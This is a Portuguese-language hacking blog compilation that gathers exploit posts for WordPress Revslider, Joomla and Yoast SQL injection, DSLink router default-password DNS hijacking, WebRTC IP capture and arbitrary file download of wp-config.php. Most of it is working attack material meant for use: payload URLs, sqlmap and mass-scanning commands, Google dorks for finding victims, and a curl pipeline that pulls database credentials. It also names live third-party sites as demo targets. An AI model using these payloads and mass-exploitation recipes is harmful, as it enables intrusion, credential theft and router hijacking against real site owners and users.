WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL

WORDPRESS EXPLOIT Revslider

Exploit que possibilita modificação do arquivo HTML da pagina, o plugin Revslider da plataforma CMS Wordpress  é bem conhecido por outras brechas de segurança, pois bem dessa vez é possível fazer uma pequena modificação do arquivo get_captions_css. 

Enviando a requisição:

Via post com seguintes campos:
array(

"action" => "revslider_ajax_action",

"client_action" => "update_captions_css",

 "data" => "_YOU_HTML_ADD_"

 );

Dentro no campo data é onde enviamos nosso HTML modificado.
Nossa array post com os dados já previamente preechidos são enviados para seguinte

URL - POST: http://{target}/wp-admin/admin-ajax.php

Com todo processo terminado podemos verifica se foi modificado o HTML do alvo.

URL - FINAL:  http://{target}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css 

USANDO EXPLOIT : 
DOWNLOAD:  http://pastebin.com/a2LHiD7U

EXECUTE:
    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
         php exploit.php -t target
         php exploit.php -f targets
         php exploit.php -t target -p 'http://localhost:9090'

OUTPUT COMAND -t:

OUTPUT COMAND -f targets.txt:

Usando em massa com SCANNER INURLBR:
DOWNLOAD:
https://github.com/googleinurl/SCANNER-INURLBR 

COMANDO:
./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt  -q 1,6  --comand-all 'php inurl_revslider.php -t _TARGET_'

OUTPUT:

REF: http://pastebin.com/eUUtgAtQ 

REF: http://blog.inurl.com.br/search/label/wordpress

[DSLink 260E] - Defaut Passwords DNS Change

xplDSLink260E SCANNER

Eae galera tudo certo ?

Ah um tempo atrás eu estava pesquisando alguns router(roteadores) vulneráveis a diversos tipos de ataques mas comuns, Durante a pesquisa encontrei 10 routers com senhas padrões em apenas um range de ip do modelo DSLink 260E, Todos com senhas padrões e com (forms) para alteração de DNS, Em 10 routers obtive sucesso realizando alteração de DNS.

Então desenvolvi um mini scanner em python, que realiza um pequeno bruteforce com usuários e senhas padrões definidos dentro do código e depois de encontrado usuário e senha ele envia um request get realizando a alteração dos DNS.

Execução: 

• root@jh00n:~/Desktop/codes# python xpl.py <IP>
• [Aqui você será definido o ip do roteador]

  Retorno:

• [ + ] DNS changed sucess in: 127.0.0.1 | user@password

• Em caso de sucesso o return "DNS changed sucess in: IP | user@password"

[ DEMO ] 

SCRIPT DOWNLOAD :
https://github.com/jh00nbr/xplDSLink260E/blob/master/xpl.py
 

MINI EXPLOIT: Joomla Simple Photo Gallery - SQL injection + VIDEO

Usando miniexploit para explorar em massa vários alvos.

Title: Joomla Simple Photo Gallery - SQL injection
Date : 13-03-2015
Vendor Homepage: https://www.apptha.com/
Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
Version : 1
Tested on : sqlmap

POC:
http://{$target}/index.php?option=com_simplephotogallery&view=images&albumid=[SQLI]

Comando SQLMAP de exploração:
sqlmap  -u '{$target}/index.php?option=com_simplephotogallery&view=images&albumid=1' -p albumid --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba

DORK de pesquisa:
Dork Google 1: inurl:/com_simplephotogallery site:com
Dork Google 2: inurl:/com_simplephotogallery site:org
Dork Google 3: inurl:/com_simplephotogallery site:fr
Dork Google 4: inurl:/com_simplephotogallery/


Agora vamos organizar nosso comando INURLBR  para executar nosso miniexploit.php
Primeiro vamos organizar o parâmetro --dork que captura seu filtro de busca.

 --dork Defines which dork the search engine will use.
     Example: --dork {dork}
     Usage:   --dork 'site:.gov.br inurl:php? id'
     - Using multiples dorks:
     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'

Parâmetro organizado:
--dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/'

Baixar MINI exploit-SQLMAP / Joomla Simple Photo Gallery 1.0 - SQL injection: 
http://pastebin.com/Gb5uhPKW
File: miniexploit.php

Baixar scanner INURLBR 1.0:
https://github.com/googleinurl/SCANNER-INURLBR
File: inurlbr.php


Executando:
./inurlbr.php --dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/' -s save.txt -q 1,6 --command-all "php miniexploit2.php '_TARGET_'"

VÍDEO AULA:


REF:
http://www.exploit-db.com/exploits/36385/
https://github.com/sqlmapproject/sqlmap/wiki/Usage
http://blog.inurl.com.br/2015/03/desenvolvendo-mini-exploits-otimizando.html

Desenvolvendo Mini exploits, otimizando seu tempo.

Vamos otimizar nosso tempo criando mini exploits.

mini exploits defino da seguinte forma: É um conjunto de comandos que possibilita execução de varias rotinas, assim poupando tempo. A não ser que queira toda vez digitar sempre os mesmos parâmetros.
Criaremos um mini exploit que vamos usar junto ao SCANNER INURLBR, mas antes você deve entender os parâmetros especiais do scanner INURLBR que usaremos.

1. _TARGET_ é um parâmetro especial que passando para que seja substituído pelo domínio do nosso alvo.
2. _TARGETFULL_ é um parâmetro especial que passando para que seja substituído pela URL inteira do nosso alvo.

Mais detalhes:
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

Tais parâmetros são usados nos comandos de execução em terminal.

• Comando --comand-vul {comando_terminal}--comand-vul Executa comandos no terminal para cada URL encontrada vulnerável.
• Comando --comand-all {comando_terminal}--comand-all Executa comandos no terminal para todas URL's encontradas.

Ex:
Logica de uso:

O scanner INURLBR filtra os resultados dos motores de busca em seguida executando comandos no terminal através dos parâmetros --comands all & vul.

Com tal logica em mente agora podemos criar um mini exploit para executar o SQLMAP em ataques de sql injection, seja ele remoto ou localhost.

1 - Criaremos um miniexploit.php
2 - Agora vamos inserir nossa programação que captura o alvo e toma as devidas rotinas necessárias.

<?php

#COMENTÁRIO:  printando na tela uma mensagem.
echo "[+]  MINI exploit-SQLMAP\n"; 
#COMENTÁRIO: capturando o primeiro parâmetro passado para nosso script.
$target = $argv[1]; 
#COMENTÁRIO: comando sqlmap pronto agora vamos concatenar nosso alvo ao comando.
$command = "sqlmap -u '{$target}' --batch --random-agent --level 2 --risk 1  --answers='follow=N'";
#COMENTÁRIO: agora vamos usar function nativa do php para executar o SQLMAP contra nosso alvo.
system($command, $dados).empty($dados[0]) ? exit() : NULL;

?>

Executando nosso script:
php miniexploit.php http://www.target.com.br

Com nosso exploit funcionando agora vamos vincular com scanner INURLBR.
Comando INURLBR:
Se deseja usar filtro em motores de busca:
ex: php inurlbr.php --dork 'SUA_DORK' -s salvar.txt -q 1,6  --comand-all "php  miniexploit.php '_TARGETFULL_'"

Execução:

Comando executado:

./inurlbr.php --dork 'inurl:php site:.br inurl:(id|pag|new|abir|open|acess) & "Warning: "' -s save.txt -q 1,6 --command-all "php miniexploit.php '_TARGETFULL_'"

Tal logica pode ser usada para executar mais de um comando ou exploit especifico:
Exemplo em código PHP:

$target = $argv[1]; 
$command = "nmap -sV -p 22,80,21 {$target}";
system($command, $dados);

$command = "nikto -h {$target}";
system($command, $dados).empty($dados[0]) ? exit() : NULL;

Exemplo usando msfcli do metasploit  - Hunting For MSSQL:

$target = $argv[1]; 
$command = "msfcli auxiliary/scanner/mssql/mssql_ping RHOSTS={$target} E";

system($command, $dados).empty($dados[0]) ? exit() : NULL;

Resultado é semelhante a isso:
[*] SQL Server information for $target:
[*] tcp = 1433
[*] np = SSHACKTHISBOX-0pipesqlquery
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SSHACKTHISBOX-0
[*] Auxiliary module execution completed

Vídeo aula criando um script em Bash pra otimizar um ataque junto ao msfcli.

BAIXAR SCRIPT SCANNER INURLBR

https://github.com/googleinurl/SCANNER-INURLBR

REF'S:
hunting for MSSQL

http://www.offensive-security.com/metasploit-unleashed/Hunting_For_MSSQL

msfcli-basics tutorial

https://www.hackthissite.org/articles/read/1135

msfcli provides a powerful command-line interface to the framework.

http://luom.net/metasploit-unleashed/Msfcli.html

metasploit-unleashed

http://www.offensive-security.com/metasploit-unleashed/Msfcli

learning metaploit framework

http://cs.uccs.edu/~cs591/metasploit/users_guide3_1.pdf

basics of penetration testing

http://www.netpro.me/uploads/1/0/8/7/10874032/openmirrors.com__the_basics_of_hacking_and_penetration_testing__ethical_hacking_and_penetration_testing_made_easy.pdf

bash-scripting with msfcli

http://www.youtube.com/watch?v=Jt6ynMun8Tk

metasploit with 1 command
http://www.governmentsecurity.org/forum/topic/18963-metasploit-with-1-command/

exploiting windows 2003 server reverse shell
http://resources.infosecinstitute.com/exploiting-windows-2003-server-reverse-shell/

WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection / MINI EXPLOIT SQLMAP + SCANNER INURLBR

O WordPress SEO by Yoast plugin é usado por milhões de sites WordPress que querem ser encontrados na internet. O WordPress SEO by Yoast plugin é plugin gratuito voltado para otimização de sites para motores de busca, com intuito de aumentar seu ranking page em motores.

Descrição Técnica:

A vulnerabilidade de injeção blind SQL autenticado pode ser encontrado dentro do arquivo'admin/class-bulk-editor-list-table.php'. Os parâmetros GET order by e ordem não são suficientemente higienizado antes de serem usados dentro de uma consulta SQL.

Line 529:

$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field( $_GET['orderby'] ) ) : 'post_title';

Line 533:

order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );


Proof of Concept (PoC):
O seguinte pedido GET fará com que a consulta SQL possa executar e dormir por 10 segundos, se clicou no como um administrador autenticado, editor ou usuário autor.

http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc


DORK: inurl:admin.php?page=wpseo_bulk

Desenvolvi um mini exploit para ser executado junto com SCANNER INURLBR ou separadamente via da sua preferencia usando sqlmap para tal exploração.
O scanner INURLBR fará toda busca e em seguida o mine exploit vai explorá-lo com sqlmap.

Otimização:
FULL: http://pastebin.com/gi1Q4NmQ

EXECUTE MINI EXPLOIT: php mini_exploit.php www.target.com.br
COMANDO INURLBR:
./inurlbr.php --dork 'inurl:admin.php?page=wpseo_bulk' -s seo.txt -q 1,6 --comand-all "php mini_exploit.php _TARGET_" 

REF:
https://wpvulndb.com/vulnerabilities/7841
http://cyberwarzone.com/sql-vulnerability-in-wordpress-seo-by-yoast-patch-immediatly/

WebRTC - JavaScript bypass TOR/VPN - windows

Usuários de VPN estão enfrentando uma falha de segurança enorme, em que  sites podem ter acesso facilmente a seus endereços de IP através WebRTC.
A vulnerabilidade é limitado a navegadores de suporte, Firefox e Chrome, e parece afetar apenas os usuários do Windows. Felizmente a falha de segurança é relativamente fácil de corrigir.

WebRTC é uma API em desenvolvimento elaborada pela World Wide Web Consortium (W3C) para permitir aos navegadores executar aplicações de chamada telefônica, video chat e compartilhamento P2P sem a necessidade de plugins.

Revelações feitas pelo boxedThe Snowden deixaram claro que a privacidade on-line não é, certamente, um dado adquirido.

Apenas alguns dias atrás, nós aprendemos que o Governo canadense rastreados visitantes de dezenas de sites de compartilhamento de arquivo populares.

Como essas histórias fazem manchetes em tem todo o interesse mundial em serviços de anonimato, tais como VPNs tem aumentado, como até mesmo os usuários regulares da Internet não gosta da idéia de ser espionados.

Infelizmente, até mesmo os melhores serviços de VPN não podem garantir que ser 100% de segurança. Nesta semana, uma muito preocupante falha de segurança revelou que é fácil de ver os verdadeiros endereços IP de muitos usuários de VPN através de um recurso WebRTC.

Com algumas linhas de código, sites podem fazer solicitações para atordoar os servidores e log VPN IP-address dos usuários e o "hidden" home IP-address IP, bem como endereços de rede local.

A vulnerabilidade afeta navegadores WebRTC de suporte, Firefox e Chrome e parece estar limitada a máquinas Windows.

A demo publicada no GitHub pelo desenvolvedor Daniel Roesler permite que as pessoas para verificar se eles são afetados pela falha de segurança.

DEMO:

TESTE-DEMO: https://diafygi.github.io/webrtc-ips/

A demo afirma que plugins do navegador não podem bloquear a vulnerabilidade, mas felizmente isso não é inteiramente verdade. Existem várias soluções fáceis disponíveis para corrigir a falha de segurança.

Usuários do Chrome podem instalar a extensão bloco WebRTC ou ScriptSafe, que tanto supostamente pode bloquear a vulnerabilidade.
https://chrome.google.com/webstore/detail/webrtc-block/nphkkbaidamjmhfanlpblblcadhfbkdm

Usuários do Firefox deve ser capaz de bloquear o pedido com o addon NoScript. Alternativamente, eles podem digitar "about: config" na barra de endereços e definir a configuração "media.peerconnection.enabled" para false.

Exemplo-firefox:

Outras maneiras de fugir da falha.

"Talvez a melhor maneira de ser protegido de WebRTC e vulnerabilidades semelhantes é executar o túnel VPN diretamente no roteador. Isso permite que o usuário seja conectado a uma VPN diretamente via Wi-Fi, não deixando nenhuma possibilidade de um script desonestos ignorando um túnel VPN software e encontrar a própria IP real ", diz  Ben Van der Pelt tells - TorGuard’s.

"Durante testes usuários do Windows que foram conectados por meio de um roteador VPN não eram vulneráveis a vazamentos WebRTC IP mesmo sem quaisquer correções do navegador".

Enquanto as correções acima são relatados para o trabalho, o vazamento é um lembrete de que o anonimato nunca deve ser tomada como garantida.

Como é frequentemente o caso com este tipo de vulnerabilidades, os usuários de VPN e proxy devem verificar regularmente se a sua conexão é segura. Isso também inclui o teste contra vazamentos de DNS e vulnerabilidades de proxy.

Update: O FreeBSD também parece estar afetado pela vulnerabilidade.

Não só Google Chrome,Mozilla Firefox que usam suporte API WebRTC, mas também Opera e Maxthon Cloud Browser podem ter sidos afetados.

Com modificações fizemos nosso scripts de exploração que alem de capturar o ip já faz o trapalho de salvar em um outpufile.


ARQUIVO-1 EXPLORAÇÃO:
http://pastebin.com/2u55h7Dj

ARQUIVO-2 SALVAR IPS:
Nome arquivo inurlbrasil.php
http://pastebin.com/Wbw9GhPc

Ao acessar o arquivo exploração-1, o mesmo passa via request get os ips captados do cliente para o arquivo-2(inurlbrasil.php) , assim já armazenando o mesmo no arquivo local server detentor do script.

FILE OUTPUT:

Fonte referencia:
http://pt.wikipedia.org/wiki/WebRTC
https://www.reddit.com/r/VPN/comments/2tva1o/websites_can_now_use_webrtc_to_determine_your
https://torguard.net/blog/browser-security-vulnerability-may-allow-real-ip-leak/
http://torrentfreak.com/huge-security-flaw-leaks-vpn-users-real-ip-addresses-150130/
https://twitter.com/jeremiahg/status/561892669279191040

0days Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification

-------------------------------------------------------------------------------------------

Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143

-------------------------------------------------------------------------------------------

Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142

-------------------------------------------------------------------------------------------

Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144

-------------------------------------------------------------------------------------------

All themes above, are failing in the same revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

Exploit developed can check about 20 themes, and allows check standard as follows.POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Which is the same as 0day mentioned above.

[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php

Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR

Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

Brief introduction --comand

--comand-vul Every vulnerable URL found will execute this command parameters.
     Example: --comand-vul {command}
     Usage:   --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
              --comand-vul './exploit.sh _TARGET_ output.txt'

 --comand-all Use this commmand to specify a single command to EVERY URL found.
     Example: --comand-all {command}
     Usage:   --comand-all 'nmap sV -p 22,80,21 _TARGET_'
              --comand-all './exploit.sh _TARGET_ output.txt'

    Observation:
    _TARGET_ will be replaced by the URL/target found, although if the user
    doesn't input the get, only the domain will be executed.
   _TARGETFULL_ will be replaced by the original URL / target found.

-------------------------------------------------------------------------------------------

INURLBR ADVANCED CONTROL

php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'

[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR

[TUTORIAL] - Hacking Painel Wordpress - Slider Revolution

[TUTORIAL] - Getting access to the Wordpress panel


REF:
http://pastebin.com/cGpxRQCs
http://blog.inurl.com.br/2015/01/arbitrary-file-download-vulnerability.html
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html
http://blog.inurl.com.br/2014/08/wordpress-plugin-kenburner-slider-lfd.html
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

Arbitrary File Download vulnerability no tema Bretheon do wordpress

Arbitrary File Download vulnerability o que eu chamo de A.F.D.

Foi encontrada tal falha no tema Bretheon do wordpress.

--------------------------------------------------------------------------------------------------------------

DETALHES
Acesso: http://1337day.com/exploit/23140
Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability
Date: 17/01/2014
Exploit Author: MindCracker - Team MaDLeeTs
Contact : [email protected] - [email protected]| https://twitter.com/MindCrackerKhan 
Tested on: Linux / Window

Google Dork: inurl:wp-content/themes/bretheon/
Demo

http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

 PoC

http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

--------------------------------------------------------------------------------------------------------------

Como tal falha no tema não usa nada de novo e o caminho padrão "admin-ajax.php?action=revslider_show_image&img="  nosso exploit desenvolvido meses atrás já faz tal verificação e pode ser usado tranquilamente.

--------------------------------------------------------------------------------------------------------------

[TUTORIAL]: 

https://www.youtube.com/watch?v=w6pxPR_s05w

TUTORIAL DETALHES:
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html

EXECUTE:
php exploit.php www.target.gov.us

--------------------------------------------------------------------------------------------------------------

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html

--------------------------------------------------------------------------------------------------------------